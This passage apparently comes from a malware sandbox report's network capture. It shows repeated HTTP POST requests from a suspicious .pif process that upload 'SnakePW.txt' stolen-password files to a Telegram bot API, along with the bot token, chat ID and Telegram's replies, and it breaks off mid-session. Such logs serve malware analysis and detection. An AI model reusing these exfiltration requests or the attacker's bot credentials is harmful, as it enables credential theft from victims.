                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 36 66 65 35 61 39 33 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2056fe5a93edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:51 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418844,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.549896149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:52 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2049c4599bf0
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:52 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 34 39 63 34 35 39 39 62 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2049c4599bf0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:53 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:53 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:53 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418846,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.549897149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:52 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2101f28456d5
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:52 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 30 31 66 32 38 34 35 36 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2101f28456d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:53 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:53 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:53 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418848,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.549898149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:52 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd206c71d33bae
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:52 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 36 63 37 31 64 33 33 62 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd206c71d33baeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:53 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:53 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:53 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418849,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535073,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.549903149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:54 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd205f4e93af8a
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:54 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 66 34 65 39 33 61 66 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd205f4e93af8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:55 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:55 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:55 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418852,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      25192.168.2.549904149.154.167.220443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:54 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd211ac1c4f774
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:54 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 31 61 63 31 63 34 66 37 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd211ac1c4f774Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:55 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:55 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:55 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418854,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.549905149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:54 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2081d1ada311
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:54 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 38 31 64 31 61 64 61 33 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2081d1ada311Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:55 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:55 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:55 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418855,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535075,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.549911149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:56 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
